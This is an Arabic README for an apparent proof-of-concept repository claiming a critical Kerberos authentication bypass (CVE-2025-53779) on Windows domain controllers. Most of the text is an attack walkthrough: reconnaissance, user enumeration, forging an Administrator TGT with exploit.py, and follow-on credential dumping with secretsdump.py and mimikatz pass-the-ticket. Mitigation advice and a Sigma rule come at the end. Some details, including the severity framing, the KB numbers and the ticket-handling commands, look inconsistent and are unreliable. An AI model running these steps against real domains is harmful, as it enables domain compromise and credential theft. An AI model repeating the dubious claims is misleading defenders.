
إعادة إنتاج cve-2025-53779-kerberos_bypass_reproduction
درجة CVSS: 9.8 (حرجة)
الحالة: استغلال نشط في البيئات الحقيقية
الإفصاح: تحديثات Patch Tuesday من Microsoft لشهر أغسطس 2025 (ثغرة يوم-صفر)
CVE-2025-53779 هي ثغرة حرجة لتجاوز المصادقة في تنفيذ بروتوكول Kerberos في Microsoft Windows. يمكن لمهاجم غير مصادق استغلال هذه الثغرة لتجاوز مصادقة Kerberos بالكامل، وانتحال شخصية أي مستخدم في المجال — بما في ذلك مسؤولو المجال — دون امتلاك بيانات اعتماد صالحة أو أي مواد تشفيرية.
منحت Microsoft هذه الثغرة درجة 9.8 (حرجة) على مقياس CVSS نظرًا لانخفاض تعقيد الهجوم، وعدم اشتراط أي صلاحيات، وعدم الحاجة إلى تفاعل المستخدم، وإمكانية الاختراق الكامل للأنظمة المرتبطة بالمجال.
تكمن الثغرة في خدمة مركز توزيع مفاتيح Kerberos (KDC) (kdsvc.dll) على وحدات تحكم المجال في Windows. على وجه التحديد، يسمح خطأ في منطق التحقق في روتين التحقق من شهادة سمات الامتياز (PAC) للمهاجم بتشكيل رسالة AS-REQ أو TGS-REQ تتجاوز فحوصات المصادقة القياسية.
kdsvc.dllيفشل مركز KDC في التحقق بشكل صحيح من حقل pac-signature-data في بنية PAC عند تعيين علامات محددة في نص رسالة Kerberos. من خلال إرسال رسالة AS-REQ مصممة خصيصًا مع نوع بيانات PA-PAC-REQUEST معدّل وإدخال بيانات تفويض مزورة، يخدع المهاجم مركز KDC لإصدار تذكرة منح التذاكر (TGT) لأي اسم رئيسي للمستخدم (UPN) دون الحاجة إلى المفتاح طويل الأمد المقابل.
يتجاوز الهجوم المصادقة المسبقة (يتم تجاهل علامة REQUIRES_PRE_AUTH فعليًا) ويتخطى التحقق من PAC تمامًا، مما يسمح للتذكرة المُنشأة باحتواء عضويات مجموعات عشوائية (مثل Domain Admins وEnterprise Admins).
جميع الإصدارات المدعومة من Windows Server المتأثرة قبل تحديث الأمان لشهر أغسطس 2025:
| إصدار Windows | متأثر | التحديث المُصلِح |
|---|---|---|
| Windows Server 2025 | ✅ نعم | KB5044289 |
| Windows Server 2022 | ✅ نعم | KB5044285 |
| Windows Server 2019 | ✅ نعم | KB5044277 |
| Windows Server 2016 | ✅ نعم | KB5044293 |
| Windows Server 2012 R2 | ✅ نعم | KB5044297 |
| Windows Server 2012 | ✅ نعم | KB5044291 |
| Windows Server 2008 R2 (ESU) | ✅ نعم | KB5044301 |
| Windows Server 2008 (ESU) | ✅ نعم | KB5044303 |
ملاحظة: إصدارات عملاء Windows (Windows 10 وWindows 11) غير متأثرة لأنها لا تشغّل خدمة KDC.
impacketexploit.py)pip install impacket pycryptodome
أو باستخدام ملف requirements.txt المرفق:
pip install -r requirements.txt
استخدم Nmap لاكتشاف خدمات Kerberos:
nmap -sU -p 88 --script krb5-enum-users <target-ip>
أو استخدم فحص Kerberos المدمج:
python exploit.py --scan <target-ip>
إذا كنت لا تعرف مستخدمي المجال، قم بتعدادهم عبر AS-REP roasting أو LDAP:
python exploit.py --enum <target-ip> <domain>
قم بإنشاء تذكرة TGT مزورة لمستخدم مستهدف:
python exploit.py --dc-ip <dc-ip> --domain <domain> --target-user <username>
مثال:
python exploit.py --dc-ip 192.168.1.10 --domain corp.local --target-user Administrator
يُخرج الاستغلال ملف تذكرة بتنسيق Kirbi. استخدم أدوات Impacket للتحقق:
# Export the ticket
set KRB5CCNAME=ticket.kirbi
# Use the ticket to access a resource
python examples/secretsdump.py -k -no-pass <domain>/Administrator@<target>
بمجرد الحصول على تذكرة TGT صالحة، يمكنك:
secretsdump.py -k -no-pass domain/Administrator@<dc>mimikatz "kerberos::ptt ticket.kirbi"ينفّذ السكربت المرفق exploit.py تدفق الهجوم التالي:
PA-PAC-REQUEST مزور وبيانات تفويض معدلةkdsvc.dllAttacker Domain Controller (KDC)
| |
| AS-REQ (forged PA-PAC-REQUEST) |
| - cname: Administrator |
| - sname: krbtgt/DOMAIN |
| - padata: PA-PAC-REQUEST + |
| forged auth-data |
|------------------------------------->|
| |
| [Vulnerable Path] |
| 1. KDC receives AS-REQ |
| 2. Checks PA-PAC-REQUEST flag |
| 3. **Bypasses pre-auth check** |
| 4. Skips PAC verification |
| 5. Generates TGT with arbitrary |
| groups via auth-data |
| |
| AS-REP (forged TGT) |
| - Encrypted with krbtgt key |
| - Contains forged PAC |
|<-------------------------------------|
| |
| TGS-REQ (use forged TGT) |
| - Request service ticket |
| - For any service (CIFS, LDAP, |
| HTTP, HOST) |
|------------------------------------->|
| |
| TGS-REP (service ticket) |
| - Legitimate service ticket |
| - Attacker can now access |
| any resource |
|<-------------------------------------|
تطبيق تحديثات Patch Tuesday من Microsoft لشهر أغسطس 2025 — هذا هو الإصلاح الأساسي. راجع جدول الإصدارات المتأثرة أعلاه لمعرفة KB المقابل.
مراقبة محاولات الاستغلال:
تقسيم الشبكة:
تفعيل تسجيل إضافي:
NetworkProvider\Kerberos\Operational)قاعدة سيغما (AS-REQ بدون مصادقة مسبقة):
title: CVE-2025-53779 Kerberos Authentication Bypass
logsource:
product: windows
service: security
detection:
selection:
EventID: 4768
PreAuthenticationType: 0 # No pre-authentication required
condition: selection
falsepositives:
- Users with "Do not require Kerberos preauthentication" set